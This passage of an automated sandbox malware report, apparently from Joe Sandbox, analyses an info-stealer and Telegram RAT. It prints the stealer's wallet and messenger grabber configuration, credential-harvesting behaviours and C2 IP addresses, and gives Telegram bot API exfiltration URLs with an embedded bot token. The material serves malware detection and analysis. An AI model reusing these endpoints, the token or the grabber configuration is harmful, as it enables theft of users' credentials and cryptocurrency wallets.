name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: powershell.exe, 00000001.00000002.1715254235.00000000062C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal WLAN passwords
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Gurcu Stealer
                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Yara detected WhiteSnake Stealer
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		31
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		Logon Script (Windows)1
                  Scheduled Task/Job                  		1
                  Timestomp                  		Security Account Manager241
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		21
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Clipboard Data                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets161
                  Virtualization/Sandbox Evasion                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input Capture3
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1390172 Sample: jqOHOuPMJP.exe Startdate: 10/02/2024 Architecture: WINDOWS Score: 100 95 api.telegram.org 2->95 97 serveo.net 2->97 99 ip-api.com 2->99 113 Multi AV Scanner detection for domain / URL 2->113 115 Found malware configuration 2->115 117 Antivirus detection for URL or domain 2->117 121 11 other signatures 2->121 11 jqOHOuPMJP.exe 16 5 2->11         started        16 vkefq4cv.oil.exe 2->16         started        18 vkefq4cv.oil.exe 2->18         started        20 3 other processes 2->20 signatures3 119 Uses the Telegram API (likely for C&C communication) 95->119 process4 dnsIp5 109 82.147.85.194, 49729, 80 SIBTEL-ASRU Russian Federation 11->109 93 C:\Users\user\AppData\...\vkefq4cv.oil.exe, PE32 11->93 dropped 143 Adds a directory exclusion to Windows Defender 11->143 145 Disables UAC (registry) 11->145 22 vkefq4cv.oil.exe 6 11->22         started        26 powershell.exe 22 11->26         started        147 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->147 149 Tries to steal Mail credentials (via file / registry access) 16->149 151 Tries to harvest and steal browser information (history, passwords, etc) 16->151 153 Tries to harvest and steal WLAN passwords 16->153 28 cmd.exe 16->28         started        30 cmd.exe 16->30         started        32 ssh.exe 16->32         started        34 WerFault.exe 16->34         started        file6 signatures7 process8 file9 91 C:\Users\user\AppData\...\vkefq4cv.oil.exe, PE32 22->91 dropped 129 Machine Learning detection for dropped file 22->129 131 Found many strings related to Crypto-Wallets (likely being stolen) 22->131 36 cmd.exe 1 22->36         started        39 WmiPrvSE.exe 26->39         started        41 conhost.exe 26->41         started        133 Tries to harvest and steal WLAN passwords 28->133 43 conhost.exe 28->43         started        45 chcp.com 28->45         started        47 netsh.exe 28->47         started        49 findstr.exe 28->49         started        53 4 other processes 30->53 51 conhost.exe 32->51         started        signatures10 process11 signatures12 123 Uses schtasks.exe or at.exe to add and modify task schedules 36->123 125 Uses netsh to modify the Windows network and firewall settings 36->125 127 Tries to harvest and steal WLAN passwords 36->127 55 vkefq4cv.oil.exe 14 5 36->55         started        59 conhost.exe 36->59         started        61 timeout.exe 1 36->61         started        63 2 other processes 36->63 process13 dnsIp14 103 ip-api.com 208.95.112.1, 49737, 49739, 80 TUT-ASUS United States 55->103 105 api.telegram.org 149.154.167.220, 443, 49743, 49744 TELEGRAMRU United Kingdom 55->105 107 2 other IPs or domains 55->107 135 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->135 137 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 55->137 139 Tries to steal Mail credentials (via file / registry access) 55->139 141 3 other signatures 55->141 65 cmd.exe 55->65         started        68 cmd.exe 55->68         started        70 ssh.exe 55->70         started        signatures15 process16 dnsIp17 111 Tries to harvest and steal WLAN passwords 65->111 73 conhost.exe 65->73         started        75 chcp.com 65->75         started        77 netsh.exe 65->77         started        79 findstr.exe 65->79         started        81 conhost.exe 68->81         started        83 chcp.com 68->83         started        85 netsh.exe 68->85         started        87 findstr.exe 68->87         started        101 serveo.net 138.68.79.95, 22, 49740, 49742 DIGITALOCEAN-ASNUS United States 70->101 89 conhost.exe 70->89         started        signatures18 process19

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  jqOHOuPMJP.exe13%ReversingLabs
                  jqOHOuPMJP.exe24%VirustotalBrowse
                  jqOHOuPMJP.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  serveo.net8%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  http://www.microsoft.co(=0%Avira URL Cloudsafe
                  https://e2111f95f52ba8be6b2d3394e38b1722.se0%Avira URL Cloudsafe
                  http://crl.v0%URL Reputationsafe
                  http://193.142.58.127:800%Avira URL Cloudsafe
                  http://23.224.102.6:80010%Avira URL Cloudsafe
                  http://216.250.190.139:80100%Avira URL Cloudmalware
                  http://185.119.118.59:80800%Avira URL Cloudsafe
                  http://216.250.190.139:808%VirustotalBrowse
                  http://193.142.58.127:807%VirustotalBrowse
                  http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user0%Avira URL Cloudsafe
                  http://185.119.118.59:80801%VirustotalBrowse
                  http://185.119.118.59:808020%Avira URL Cloudsafe
                  http://107.161.20.142:80800%Avira URL Cloudsafe
                  http://107.161.20.142:80803%VirustotalBrowse
                  http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user0%Avira URL Cloudsafe
                  https://13.231.21.109:4430%Avira URL Cloudsafe
                  https://192.99.196.191:443100%Avira URL Cloudmalware
                  http://185.119.118.59:808021%VirustotalBrowse
                  https://e483612b93e055308d0c85f365c474ee.serveo.net/0%Avira URL Cloudsafe
                  http://66.42.56.128:80100%Avira URL Cloudmalware
                  https://64.227.21.98:4430%Avira URL Cloudsafe
                  http://23.224.102.6:80011%VirustotalBrowse
                  http://185.119.118.59:8080/get0%Avira URL Cloudsafe
                  https://13.231.21.109:4430%VirustotalBrowse
                  http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user0%Avira URL Cloudsafe
                  http://129.151.109.160:80800%Avira URL Cloudsafe
                  http://66.42.56.128:809%VirustotalBrowse
                  http://127.0.0.1:6787/0%Avira URL Cloudsafe
                  http://82.147.850%Avira URL Cloudsafe
                  http://82.147.85.194/byte/@jokerbot880901.txt100%Avira URL Cloudmalware
                  http://129.151.109.160:80803%VirustotalBrowse
                  http://23.248.176.37:1800%Avira URL Cloudsafe
                  https://64.227.21.98:4430%VirustotalBrowse
                  http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr0%Avira URL Cloudsafe
                  http://82.147.850%VirustotalBrowse
                  http://185.119.118.590%Avira URL Cloudsafe
                  http://127.0.0.1:0%Avira URL Cloudsafe
                  http://45.61.136.52:800%Avira URL Cloudsafe
                  http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net0%Avira URL Cloudsafe
                  http://185.119.118.59:8080/get1%VirustotalBrowse
                  http://23.248.176.37:1801%VirustotalBrowse
                  http://185.119.118.59:8080/hkLYW_user0%Avira URL Cloudsafe
                  http://45.61.136.13:800%Avira URL Cloudsafe
                  http://45.61.136.52:800%VirustotalBrowse
                  http://154.26.128.6:800%Avira URL Cloudsafe
                  http://212.6.44.53:80800%Avira URL Cloudsafe
                  http://185.217.98.121:80100%Avira URL Cloudmalware
                  https://44.228.161.50:443100%Avira URL Cloudmalware
                  http://212.6.44.53:80801%VirustotalBrowse
                  http://104.248.208.221:800%Avira URL Cloudsafe
                  https://164.90.185.9:443100%Avira URL Cloudmalware
                  https://44.228.161.50:4432%VirustotalBrowse
                  http://185.119.118.590%VirustotalBrowse
                  http://104.248.208.221:801%VirustotalBrowse
                  http://154.26.128.6:800%VirustotalBrowse
                  http://18.228.80.130:80100%Avira URL Cloudmalware
                  http://185.217.98.121:8015%VirustotalBrowse
                  http://185.217.98.121:8080100%Avira URL Cloudmalware
                  http://193.142.58.127:80Pk0%Avira URL Cloudsafe
                  https://164.90.185.9:4439%VirustotalBrowse
                  https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net0%Avira URL Cloudsafe
                  https://e483612b93e055308d0c85f365c474ee.serveo.net0%Avira URL Cloudsafe
                  http://45.61.136.13:802%VirustotalBrowse
                  http://144.126.132.141:80800%Avira URL Cloudsafe
                  http://pesterbdd.com/i?100%Avira URL Cloudmalware
                  https://18.178.28.151:4430%Avira URL Cloudsafe
                  http://82.147.85.194/byte/100%Avira URL Cloudmalware
                  http://18.228.80.130:8011%VirustotalBrowse
                  http://127.0.0.1:6787/ing=no0%Avira URL Cloudsafe
                  http://149.88.44.159:800%Avira URL Cloudsafe
                  http://82.147.85.1940%Avira URL Cloudsafe
                  https://192.99.196.191:4434%VirustotalBrowse
                  http://185.217.98.121:808011%VirustotalBrowse
                  https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/0%Avira URL Cloudsafe
                  https://185.217.98.121:443100%Avira URL Cloudmalware
                  http://116.202.101.219:8080100%Avira URL Cloudmalware
                  https://api.tele0%Avira URL Cloudsafe
                  http://127.0.0.1:18772/handleOpenWSR?r=0%Avira URL Cloudsafe
                  http://206.189.109.146:80100%Avira URL Cloudmalware
                  http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  serveo.net
                  		138.68.79.95
                  		truefalseunknown
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTMLfalse
                        		high
                        https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTMLfalse
                          		high
                          http://ip-api.com/line?fields=query,countryfalse
                            		high
                            http://82.147.85.194/byte/@jokerbot880901.txtfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                              		high
                              https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://193.142.58.127:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 7%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.microsoft.co(=powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
